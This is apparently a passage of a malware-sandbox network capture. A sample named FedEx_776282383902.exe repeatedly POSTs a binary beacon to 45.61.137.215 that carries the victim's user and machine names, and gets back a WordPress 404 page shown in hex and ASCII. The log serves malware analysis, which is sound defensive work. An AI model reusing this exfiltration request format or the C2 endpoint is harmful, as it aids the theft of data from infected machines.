                May 22, 2024 22:03:11.167093039 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:11.171586037 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:11.171598911 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:11.173456907 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:11.175654888 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:03:11.175667048 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:03:11.175677061 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:03:11.180087090 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:03:11.180102110 CEST224INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                27192.168.2.74973945.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:11.339176893 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:11.398499966 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:15.108117104 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:11 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:15.108824968 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                May 22, 2024 22:03:15.110435009 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                May 22, 2024 22:03:15.112139940 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                May 22, 2024 22:03:15.112154961 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                May 22, 2024 22:03:15.112165928 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                May 22, 2024 22:03:15.115322113 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:03:15.115338087 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                May 22, 2024 22:03:15.116930962 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                May 22, 2024 22:03:15.116945982 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                28192.168.2.74974045.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:15.260798931 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:15.313049078 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:18.733680010 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:15 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:18.734201908 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:18.735496998 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:18.735511065 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                May 22, 2024 22:03:18.738084078 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                May 22, 2024 22:03:18.738096952 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:03:18.740662098 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:03:18.740674973 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:03:18.740684032 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                May 22, 2024 22:03:18.743223906 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                29192.168.2.74974145.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:18.886668921 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:18.936917067 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:22.165946007 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:19 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
